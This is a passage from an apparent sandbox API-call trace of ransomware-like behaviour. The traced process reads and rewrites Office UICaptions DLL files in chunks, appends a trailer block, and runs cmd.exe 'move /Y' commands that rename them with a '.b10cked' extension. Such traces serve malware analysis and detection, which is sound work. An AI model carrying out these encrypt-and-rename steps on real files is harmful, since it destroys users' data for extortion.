(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.973] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.973] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x39af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x39af, lpOverlapped=0x0) returned 1 [0160.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.974] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.974] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x39af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x39af, lpOverlapped=0x0) returned 1 [0160.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=-76207, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x129b1 [0160.974] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.975] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x39af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x39af, lpOverlapped=0x0) returned 1 [0160.976] SetFilePointer (in: hFile=0x114, lDistanceToMove=-76207, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x129b1 [0160.976] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.976] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x39af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x39af, lpOverlapped=0x0) returned 1 [0160.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0160.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0160.980] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x25360 [0160.980] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0160.980] CloseHandle (hObject=0x114) returned 1 [0160.981] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX") returned 0x3c [0160.982] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0160.982] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x90c, dwThreadId=0xd68)) returned 1 [0161.541] CloseHandle (hObject=0x1b4) returned 1 [0161.541] CloseHandle (hObject=0x114) returned 1 [0161.541] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0161.541] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0161.541] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0161.541] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0161.541] ReleaseMutex (hMutex=0xf8) returned 1 [0161.541] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0161.541] ReleaseMutex (hMutex=0xf8) returned 1 [0161.541] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0161.542] ReleaseMutex (hMutex=0xf8) returned 1 [0161.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0161.542] ReleaseMutex (hMutex=0xf8) returned 1 [0161.542] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21833402702) returned 1 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.546] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x137960 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0161.547] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x137478 [0161.548] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x137960 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0161.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0161.563] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0161.563] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x137960 [0161.563] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0161.563] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0161.563] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.572] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.631] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0161.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0161.632] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.633] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.633] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0161.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0161.633] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.641] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.801] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0161.804] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0161.804] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.804] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.805] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0161.805] SetFilePointer (in: hFile=0x114, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0161.805] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.897] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0161.988] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0161.990] SetFilePointer (in: hFile=0x114, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0161.990] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.990] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0161.991] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0161.991] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x117960 [0161.991] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0162.012] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0162.013] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0162.015] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x117960 [0162.015] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0162.015] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0162.015] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0162.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0162.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0162.021] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x137960 [0162.021] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0162.021] CloseHandle (hObject=0x114) returned 1 [0162.032] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX") returned 0x3c [0162.032] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0162.033] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xd94, dwThreadId=0xd58)) returned 1 [0162.034] CloseHandle (hObject=0x1b4) returned 1 [0162.034] CloseHandle (hObject=0x114) 